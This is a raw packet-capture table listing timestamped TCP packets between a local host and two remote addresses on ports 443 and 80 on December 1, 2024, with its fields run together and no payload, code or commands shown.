                                                            Dec 1, 2024 14:28:04.807240963 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.807307959 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.807320118 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.810508966 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.810581923 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.810590029 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.811214924 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.816046000 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.816117048 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.816124916 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.819219112 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.819282055 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.819289923 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.821221113 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.957873106 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.957931042 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.957941055 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.960612059 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.960661888 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.960669994 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.962969065 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.963011980 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.963018894 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.965507984 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.965558052 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.965568066 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.967772007 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.967822075 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.967829943 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.967909098 CET44349162142.215.209.77192.168.2.22
                                                            Dec 1, 2024 14:28:04.967945099 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:04.970387936 CET49162443192.168.2.22142.215.209.77
                                                            Dec 1, 2024 14:28:15.003839016 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:15.130455971 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:15.130527020 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:15.130621910 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:15.256855011 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437525034 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437557936 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437567949 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437613964 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.437624931 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437638044 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437715054 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.437783003 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437800884 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437812090 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437823057 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437834024 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.437834978 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.437869072 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.557710886 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.557790041 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.557818890 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.562129021 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.562155962 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.562181950 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.638822079 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.638880014 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.638987064 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.643218040 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.643266916 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.643357992 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.652055979 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.652100086 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.652177095 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.660945892 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.660990000 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.660994053 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.669770002 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.669811964 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.669852018 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.678638935 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.678716898 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.678750038 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.687436104 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.687479973 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.687560081 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.696410894 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.696451902 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.696554899 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.705243111 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.705291986 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.705344915 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.713107109 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.713151932 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.713191032 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.721041918 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.721096992 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.721139908 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.758887053 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.758981943 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.759061098 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.840094090 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.840235949 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.840276957 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.842639923 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.842695951 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.842721939 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.847959042 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.848006010 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.848071098 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.853218079 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.853282928 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.853322983 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.858270884 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.858314037 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.858314037 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.863370895 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.863440990 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.863481998 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.868376970 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.868422031 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.868475914 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.873481035 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.873519897 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.873545885 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.878535032 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.878577948 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.878698111 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.883547068 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.883611917 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.883764029 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.888616085 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.888669014 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.888748884 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.893666983 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.893709898 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.893786907 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.897473097 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.897526026 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.897563934 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.901282072 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.901330948 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.901469946 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.905112028 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.905159950 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.905210972 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.908936977 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.908986092 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.909049034 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.912796021 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.912841082 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.912914991 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.916594028 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.916632891 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.916902065 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.920402050 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.920448065 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:16.920516968 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.924340010 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:16.924385071 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.042505980 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.042659998 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.042748928 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.044116020 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.044266939 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.044327974 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.047058105 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.047199965 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.047243118 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.050167084 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.050179958 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.050224066 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.051687956 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.051744938 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.051789045 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.054533958 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.054661989 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.054718971 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.058885098 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.059031010 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.059070110 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.061691999 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.061837912 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.061877012 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.063945055 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.063956022 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.063991070 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.066102982 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.066226959 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.066278934 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.069014072 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.069112062 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.069158077 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.071923018 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.072045088 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.072088957 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.074800968 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.074918985 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.074964046 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.077707052 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.077796936 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.077855110 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.080684900 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.080811977 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.080854893 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.083581924 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.083658934 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.083703995 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.086355925 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.086469889 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.086519003 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.089258909 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.089354992 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.089411974 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.092205048 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.092364073 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.092406988 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.095048904 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.095166922 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.095211983 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.097959995 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.098054886 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.098102093 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.100832939 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.100955009 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.101013899 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.103754997 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.103821039 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.103859901 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.106647015 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.106794119 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.106837988 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.109513044 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.109621048 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.109664917 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.112407923 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.112512112 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.112571001 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.164304018 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.164316893 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.164362907 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.165719986 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.166100979 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.166138887 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.168534994 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.168545961 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.168593884 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.171336889 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.171346903 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.171391010 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.174006939 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.174016953 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.174065113 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.177313089 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.177324057 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.177356005 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.242429972 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.242516041 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.242588997 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.243659973 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.243727922 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.243767977 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.245599031 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.245728016 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.245769978 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.248121977 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.248244047 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.248285055 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.250679016 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.250808954 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.250853062 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.253245115 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.253308058 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.253365993 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.255733013 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.255861998 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.255906105 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.258310080 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.258384943 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.258425951 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.260806084 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.260977030 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.261022091 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.263402939 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.263416052 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.263473034 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.265871048 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.265975952 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.266020060 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.268404007 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.268496990 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.268539906 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.271281004 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.271333933 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.271375895 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.273508072 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.273556948 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.273613930 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.276025057 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.276118994 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.276160955 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.278523922 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.278624058 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.278661966 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.281084061 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.281196117 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.281241894 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.283658981 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.283730030 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.283786058 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.286192894 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.286313057 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.286355019 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.288933039 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.289104939 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.289150953 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.291182995 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.291331053 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.291377068 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.292861938 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.292937040 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.292983055 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.294492960 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.294562101 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.294619083 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.296199083 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.296313047 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.296355963 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.297719002 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.297830105 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.297871113 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.299382925 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.299520016 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.299562931 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.301004887 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.301122904 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.301163912 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.362616062 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.362693071 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.362755060 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.365705013 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.365809917 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.365847111 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.368216038 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.368515015 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.368556976 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.370765924 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.370901108 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.370945930 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.373296976 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.373346090 CET804916387.121.86.105192.168.2.22
                                                            Dec 1, 2024 14:28:17.373404980 CET4916380192.168.2.2287.121.86.105
                                                            Dec 1, 2024 14:28:17.375881910 CET804916387.121.86.105192.168.2.22
